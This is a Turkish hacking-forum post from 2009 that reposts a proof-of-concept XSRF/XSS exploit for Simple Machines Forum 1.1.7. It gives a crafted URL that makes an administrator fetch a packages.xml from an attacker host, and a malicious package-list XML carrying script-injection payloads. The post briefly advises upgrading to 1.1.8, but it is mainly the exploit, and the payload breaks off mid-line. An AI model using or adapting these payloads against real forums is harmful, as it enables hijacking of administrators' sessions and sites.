¨¨ H a c K e r ¨¨

HacKer ¨¨


    Simple Machines Forum =1.1.7 XSRF/XSS

    Paylaş
    avatar
    Admin
    Admin

    Mesaj Sayısı : 128
    Kayıt tarihi : 07/03/09
    Yaş : 21

    Simple Machines Forum =1.1.7 XSRF/XSS

    Mesaj  Admin Bir C.tesi Mart 07, 2009 6:07 pm

    Simple Machines Forum =1.1.7 XSRF/XSS

    --------------------------------------------------------------------------------

    ARkadaşlar Buyrun Smf 1.1.7 De Açık çıktı 1.1.8 çıktı güncellemenizi öneririm
    Author: Xianur0
    Vulnerable Version: All

    The Bug is located in the file: Sources/PackageGet.php

    Example:
    http://victm.com/index.php?action=pa...//attacker.com

    When the admin link between the SMF to load the file:

    http://attacker.com/packages.xml

    Save this file as packages.xml

    <?xml version="1.0"?>
    <!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
    <!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    XSRF SMF PoC By Xianur0
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

    <package-list xmlns="http://www.simplemachines.org/xml/package-list"
    xmlns:smf="http://www.simplemachines.org/">
    <list-title>Xianur0 Was Here</list-title>

    <section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[********>alert(’XSS’)</script>]]></text>
    <modification>
    <id>Xianur0:XSMF</id>
    <name>SMF PoC By Xianur0</name>
    <filename>smfexploit.zip</filename>
    <version>0.1</version>
    <author email="uxmal666@gmail.com">Xianur0</author>
    <description><![CDATA[********>alert(document

      Forum Saati C.tesi Eyl. 23, 2017 3:55 am